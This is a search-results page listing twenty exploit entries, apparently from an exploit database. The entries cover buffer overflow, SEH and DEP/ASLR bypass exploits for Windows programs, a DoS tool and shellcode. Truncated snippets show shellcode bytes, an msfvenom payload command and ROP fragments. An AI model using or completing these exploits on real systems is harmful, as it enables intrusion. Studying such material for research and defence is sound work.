20 matches found
10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH) (DEP Bypass) Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow SEHDEP Bypass Vulnerable Software: 10-Strike Network Inventory Explorer 8.54 Vendor Homepage:...
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass)
Faleemi Desktop Software 1.8 - Local Buffer Overflow SEH DEP Bypass !/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow SEHDEP Bypass Date: 01-26-19 Vulnerable Software: Faleemi Desktop Software 1.8 Vendor Homepage:...
R 3.4.4 (Windows 10 x64) Buffer Overflow
!/usr/bin/python R 3.4.4 Win10 x86 Buffer Overflow discovered by: bzyo author: Charles Truscott I love you Alison Thompson OAM tested on: Windows 10 x86 rebooted for practice defeating ASLR/DEP -------------------------------------------- GUI Preferences - paste boom.txt into 'Language for menus...
VUPlayer 2.49 .pls Stack Buffer Overflow
!/usr/bin/python import os,sys Tested Windows 7 Home x86 & Windows 10 Home x86x64 badchars \x00\x0a\x1a\x20\x40 msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x0a\x1a\x20\x40" -f python buf = "" buf += "\xbf\x3b\x99\xdd\xa3\xdb\xc4\xd9\x74\x24\xf4\x58\x29" buf +=...
MY-MP3-Player-3.0-m3u
written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe - 1014 bytes of space for shellcode shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...
Mini-Stream-Ripper-2.9.7-DEP
written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys calc.exe shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"...
NCMedia-Sound-Editor-Pro-7.5.1-SEH-DEP
Exploit: NCMedia Sound Editor Pro v7.5.1 SEHDEP Author: b33f - http://www.fuzzysecurity.com/ OS: Windows 7 Pro SP1 probably universal across 32-bit POC - Julien Ahrens XP SP3 Software: http://www.soundeditorpro.com/ import sys, socket, struct file="MRUList201202.dat"...
Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)
Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR + DEP + EMET 4.1.x Bypass MS12-037 function strtointstr return str.charCodeAt10x10000 + str.charCodeAt0; var free = "EEEE"; while free.length 500 free += free; var string1 = "AAAA"; while string1.length 500 string1 += string1; var...
CoolPlayer 2.18 - DEP Bypass
No description provided by source. Exploit Title: CoolPlayer 2.18 DEP Bypass Date: January 2, 2011 Author: Blake Version: 2.18 Tested on: Windows XP SP3 running in Virtualbox Uses SetProcessDEPPolicy to disable DEP for the process Thanks to mrme for the encouragement Exploit-DB Notes: May not wor...
BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based exploit (ASLR + DEP bypass)
No description provided by source. Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian -...
Denial-Of-Service
This Denial Of Service tool uses raw IP packets in no-novel ways to try stress the web target hosts childs It was designed to rapidly scan create 48 connections and it works fine against single hosts Required 2MB ADSL/Cable Bandwidth in order to work properly Modified by JSacco -...
Aviosoft-Digital
Aviosoft 1.x Win 7 and XP SP2/SP3 English Buffer Overflow Stack Overflow ToDo: Add Remote ToDo: Test Vulnerable Targets import struct totalsize = 5000 junk = 'A' 872 align = 'B' 136 aslr, dep bypass using pushad technique seh = struct.pack' ebx rop+= struct.pack'L', 0x640203fc ADD EAX,5EC68B64 RE...
FreeFloat FTP Server Buffer Overflow
!/usr/bin/python import socket, sys from struct import pack print "\n===============================" print "Freefloat FTP Server DEP Bypass" print " Written by Blake " print "===============================\n" if lensys.argv != 3: print " Usage: %s \n" % sys.argv0 sys.exit0 target = sys.argv1 po...
MY MP3 Player 3.0 - '.m3u' DEP Bypass
written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys print "\n============================" print " MY MP3 Player DEP Bypass " print " Bypass OptIn/OptOut Policy " print " Tested on Windows XP SP3 " print " Written by Blake " print...
MY MP3 Player 3.0 m3u Exploit DEP Bypass
Exploit for windows platform in category local exploits written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys print "\n============================" print " MY MP3 Player DEP Bypass " print " Bypass OptIn/OptOut Policy " print " Tested on Windows XP S...
Mini-Stream Ripper 2.9.7 DEP Bypass
written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys print "\n============================" print "Mini-Stream 2.9.7 DEP Bypass" print " Written by Blake " print " Tested on Windows XP SP3 " print "============================\n" calc.exe shellcode =...
Mini-Stream Ripper 2.9.7 DEP Bypass
Exploit for windows platform in category local exploits written to bypass OptIn/OptOut DEP policy tested on windows xp sp3 running in virtualbox import sys print "\n============================" print "Mini-Stream 2.9.7 DEP Bypass" print " Written by Blake " print " Tested on Windows XP SP3 " pri...
Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
This module exploits a stack buffer overflow in process bcaaa-130.exe port 16102, which comes as part of the Blue Coat Authentication proxy. Please note that by default, this exploit will attempt up to three times in order to successfully gain remote code execution in some cases, it takes as many...
OpenBSD/x86 sys_execve ('/bin/sh -c "reboot"') - 178 bytes (encoded)
Exploit database separated by exploit type (local, remote, DoS, etc.) + Site : 1337day.com + Support e-mail :...
CoolPlayer 2.18 DEP Bypass
Exploit for windows platform in category local exploits Exploit Title: CoolPlayer 2.18 DEP Bypass Date: January 2, 2011 Author: Blake Version: 2.18 Tested on: Windows XP SP3 running in Virtualbox Uses SetProcessDEPPolicy to disable DEP for the process Thanks to mrme for the encouragement Exploit-...